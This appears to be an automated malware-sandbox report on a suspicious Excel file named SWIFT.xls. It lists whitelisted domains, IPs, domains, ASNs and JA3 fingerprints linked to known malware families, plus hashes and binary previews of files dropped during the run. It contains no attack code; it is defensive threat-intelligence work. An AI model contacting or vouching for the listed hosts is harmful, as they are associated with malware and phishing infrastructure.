            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, onedscolprdgwc07.germanywestcentral.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:11:55API Interceptor907x Sleep call for process: splwow64.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            14.103.79.10SWIFT.xlsGet hashmaliciousUnknownBrowse
              SWIFT.xlsGet hashmaliciousUnknownBrowse

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                s.deemos.comSWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                s-part-0035.t-0009.t-msedge.netRZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                • 13.107.246.63
                Invoice Shipment.bat.exeGet hashmaliciousDarkCloudBrowse
                • 13.107.246.63
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 13.107.246.63
                Invoice for 04-09-24 fede39.admr.org.htmlGet hashmaliciousUnknownBrowse
                • 13.107.246.63
                https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                • 13.107.246.63
                ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                • 13.107.246.63
                pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                • 13.107.246.63
                Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                • 13.107.246.63
                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                • 13.107.246.63

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WORLDPHONE-INASNumberforInterdomainRoutingINSWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                Owari.arm.elfGet hashmaliciousUnknownBrowse
                • 14.103.40.223
                ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                • 114.69.243.134
                SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elfGet hashmaliciousMiraiBrowse
                • 14.103.40.233
                3b4m3C11Vd.elfGet hashmaliciousMiraiBrowse
                • 14.103.92.59
                HTUyCRuDev.elfGet hashmaliciousUnknownBrowse
                • 114.69.243.149
                XoQ5jUCXz6.elfGet hashmaliciousMiraiBrowse
                • 14.103.40.218

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                6271f898ce5be7dd52b0fc260d0662b3SWIFT.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                • 14.103.79.10
                https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                • 14.103.79.10
                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                • 14.103.79.10
                Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                • 14.103.79.10
                YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                • 14.103.79.10

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):118
                Entropy (8bit):3.5700810731231707
                Encrypted:false
                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                MD5:573220372DA4ED487441611079B623CD
                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2725AB5E.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13284
                Entropy (8bit):2.735825271732709
                Encrypted:false
                SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
                MD5:901DCD18F7643CAEBDE4301E05F5C748
                SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
                SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
                SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
                Malicious:false
                Reputation:low
                Preview:....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i......................................................................................../....(....../...................._...(...................N../.............m./L...............L....................../........\........./

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3E00AF8A.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):109544
                Entropy (8bit):4.282675970330063
                Encrypted:false
                SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A44D691.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):134544
                Entropy (8bit):2.9527588414114754
                Encrypted:false
                SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
                MD5:83F48FDD46D3424E92E24E709EAB5960
                SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
                SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
                SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
                Malicious:false
                Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\501D4F1C.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8184
                Entropy (8bit):2.5205008100361783
                Encrypted:false
                SSDEEP:96:EV5g2s88nD0btgf9W/I5i9OWZBKlA+B79YIRdMZgmR7qii1BoFV:Ea0bmlXfWZ4F79RdGgmR7qii1BY
                MD5:C3A324ED2E785A4646D1E0ECB3F54688
                SHA1:56C9FF224442995E89C407C532EFC617FBC68971
                SHA-256:56DC79F1F1C291BB4309EA270996665A4D37725C1DC7A9286EEC159830D1A4D9
                SHA-512:E62DE5C091E57C932D0B8BAB7AE06E05B8E64806D85EF4B775C837F0C63EC754C330B80A6A9E04B47B2F9C1D1434706B8F4329683ABAD7F94AF68BF05846D2D6
                Malicious:false
                Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\559DC076.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):150296
                Entropy (8bit):2.816744386030506
                Encrypted:false
                SSDEEP:1536:eHNiE061ENUAI8DHW/97p8/JYbhaEUbNKGqOy:CD8qOy
                MD5:00D46C8C5AF01D6F26063D3089EBFF00
                SHA1:ABA01A9C18881FA70DDA1AE843B0374403C7C1BC
                SHA-256:4C179732F6553D0204F9F87C96432EA15953CD85EE92A0A50810C43360CC6671
                SHA-512:CF9C38E9FC1A0EC92E321E643612E6575F1EFB4D8A3D7857AFE125B90AF05D9291FEFC6EB29C29A0731E5A844CCB0368E1081DA82E2E75C343C6669532FFE078
                Malicious:false
                Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................u....u.........y ...........`A....(.......0....t...v..............`\u...u0...........9...0....h...]u..X.l.)...\u.\...

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6EBA9CD0.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1293620
                Entropy (8bit):4.563127917199792
                Encrypted:false
                SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                MD5:F71C973B5E362DFD6408D6C009E5643E
                SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                Malicious:false
                Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\78BE2C6D.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):44256
                Entropy (8bit):3.147465798679962
                Encrypted:false
                SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                Malicious:false
                Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9073E603.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):44256
                Entropy (8bit):3.15066292565687
                Encrypted:false
                SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                MD5:F1EC2E98B0F577B675156B13DCF94105
                SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                Malicious:false
                Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\98ED5209.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):98872
                Entropy (8bit):2.683212156692205
                Encrypted:false
                SSDEEP:768:XOzeg0sz9sgNR/He4lzpsclOmIviIS0X9+1DW7ohBb66mQK4BTonxqQbApQKyE:+zeg0sz9sgNR/He4lzpscEmNISG9EQE
                MD5:0F51B781F5A4A57A6BADB6B2D324EA93
                SHA1:4E1B464ED1480C60760D50B6A59AEA720A603CF7
                SHA-256:0311E0368D17F93890F79333900529D4BBC64E3547EC143CB34D54BA59D68640
                SHA-512:AEEAF8FBD9AB90689122D6ED2E210F6873B6247081BDFE652EF1DBC8CEA6F8CE73D5F7DCCCAD94E3F1E899DACAEAE10B0382B96B14A713C81F7339CB0C797CA4
                Malicious:false
                Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A14D6365.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13372
                Entropy (8bit):2.648905142899473
                Encrypted:false
                SSDEEP:96:Xgk+uuzdnv7vSmd+4QXR/3sYSG3+LB3mzlNd7MxXpJPJ0HWSj0T84b4IjV:6dv/dzIRPsLGEmLd7wWj0DbN
                MD5:8E1F2CB8EA545EDEED129C53D6DD0B47
                SHA1:1D0B0BFAC585FEF8111D4AE09101F547AECA3C53
                SHA-256:92E34792CDACCDEADE34846B8A09E052AD733C91D973E0C2E5CA2020C9BED0BE
                SHA-512:39181AB0229DC768F3172103D5849B5CA9752733E66FE6F211E534E31AD2794857EF73203AE0971EBFB3E43A474D246C14E406054A93DAF38FDD41CB13779548
                Malicious:false
                Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u.[u..D.u........NAI..[u.BZ...[u..U..`]u..^u............@.......`]u.........h.<..f..h.}..h...]u..X.l.)..<`u.....

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BB5F27C7.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8208
                Entropy (8bit):2.5228805271736587
                Encrypted:false
                SSDEEP:96:Eeg2s88nD0btgf9Sl5i9OWZBWA+B79YIRdMZgmR7qii1BoFV:E/0bml4fWZw79RdGgmR7qii1BY
                MD5:AC82B9A9292E6679634010AFA3B51484
                SHA1:EA27CDAE6303D1931294122CEF6EB569074CD29A
                SHA-256:8158D56881DC5B0FC6D52BA05D0C9864D67A293F93179BC1DE21D24D9FA445FD
                SHA-512:FE9450B1764415487AD2C9B9B296F00F052B810E64C6C03B2514AC1BAC8167D0FC954401AF586A58294CE738C974D79ECA805DCB6E8A1944BA61B9C34EBB875E
                Malicious:false
                Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BB654A22.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13372
                Entropy (8bit):2.648905142899473
                Encrypted:false
                SSDEEP:96:Xgk+uuzdnv7vSmd+4QXR/3sYSG3+LB3mzlNd7MxXpJPJ0HWSj0T84b4IjV:6dv/dzIRPsLGEmLd7wWj0DbN
                MD5:8E1F2CB8EA545EDEED129C53D6DD0B47
                SHA1:1D0B0BFAC585FEF8111D4AE09101F547AECA3C53
                SHA-256:92E34792CDACCDEADE34846B8A09E052AD733C91D973E0C2E5CA2020C9BED0BE
                SHA-512:39181AB0229DC768F3172103D5849B5CA9752733E66FE6F211E534E31AD2794857EF73203AE0971EBFB3E43A474D246C14E406054A93DAF38FDD41CB13779548
                Malicious:false
                Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u.[u..D.u........NAI..[u.BZ...[u..U..`]u..^u............@.......`]u.........h.<..f..h.}..h...]u..X.l.)..<`u.....

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EA37DBF4.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13444
                Entropy (8bit):2.64547234411155
                Encrypted:false
                SSDEEP:96:tgk+uuzdnvbvSmd+4gXR/3sYSG3+LB3mzlNd7MxnpJPJ0HWSj0T84b4IjV:YdvfdzYRPsLGEmLd7wGj0DbN
                MD5:B139DA2041284D47797E9C5FA4FF7DF3
                SHA1:B87AAB70FE68479A6A9154F3A90441A5582B2E05
                SHA-256:57F09D2A10AC893D118738CDB94A49B968CB5F127F1E8156B4A33B4825CC988B
                SHA-512:900D1E52C61F15767826452A26BC467EA200A8298DD76F4A517C4FE557CE873D83B3C487777BE29B1DC270C8D958F23E2E3E3AB42EC5B3C78066A0EB8A05730A
                Malicious:false
                Preview:....l...........................|,..\... EMF.....4..U...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i........................................................k.u.[u..D.u........NAI..[u.BZ...[u..U..`]u..^u............@.......`]u.........h.<..f..h.}..h...]u..X.l.)..<`u.....

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F2A1D34B.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8084
                Entropy (8bit):2.5551694039574895
                Encrypted:false
                SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                MD5:721E8AAC81F0A6D4659831CB8194D668
                SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                Malicious:false
                Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F9D2E028.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):99352
                Entropy (8bit):2.6847207919462663
                Encrypted:false
                SSDEEP:768:hOzeQ0Mztswth/3e41zpxclOmIvi4SE3Ne1Dp7ohBb66+WKZBToE+lQbApQKdE:UzeQ0Mztswth/3e41zpxcEmN4S2Nb+wE
                MD5:FE394A9E067CDBC7197E3FEA870349AA
                SHA1:45E58779080689984B616AC559CBF6220E3D3099
                SHA-256:D9B95E8A7E05ADF0355FE1F9A53287414079F20BCD6BDDAACDE1B0C583FC3F7B
                SHA-512:7D186D1E88DB2DBC2A32EC0E56727CF815133169307D0BC909F2449C27E3872175C56669D8BD3BB8A4A6AEC06D65E427DDA5438210E7B40322826A7EE22F59D0
                Malicious:false
                Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FF37C9FF.emf

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):149960
                Entropy (8bit):2.8470944544374106
                Encrypted:false
                SSDEEP:1536:SHrA1061ENUAI8DHW/97p8/JYbhaEUbNNIK+A:jDhK+A
                MD5:66414D0ECB724299F9F97EE560CD8C22
                SHA1:19089FC7769879AC440E4EA67596554B3E3D4AEE
                SHA-256:07F3F2C83AD4434B1F21DA975911E9898E14C812A83A2A02757674E2EE0D4A61
                SHA-512:910492248C8515BB7B5358E38DC7F376111B5B059367BD7560739253356267A81ADABF5B585F51093990F1A23F4E0EF5CA55BEA5A4B7FFB5F28FF6C36E11F00C
                Malicious:false
                Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n.....................................u....u.........y ...........`A....(.......0....t...v..............`\u...u0...........9...0....h...]u..X.l.)...\u.\...

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\qjE1BcWg[1].txt

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):38
                Entropy (8bit):4.218469211370857
                Encrypted:false
                SSDEEP:3:XMzKXvwg3ekVR:wKoPg
                MD5:747C4630DB2B517212CBB21C143BBCC0
                SHA1:C6EF21A5467CEC5C604F2A1D74F3CA01FEA45766
                SHA-256:9BECF04824FD08F7A82078A50CD483D16682F0F04FCABA8464E1AB64CF719283
                SHA-512:195DE64DA15BD3E5731E0C2732565908765429C423D619E679F7D153493532CA37DF5D25D2F107CC960EACA037A27D6875E5C4192D85F01480CB8E757959558C
                Malicious:false
                Preview:Moved Permanently. Redirecting to /404

                C:\Users\user\AppData\Local\Temp\~DF8026A2322A34E103.TMP

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DFA2BD46232F560DC8.TMP

                Download File
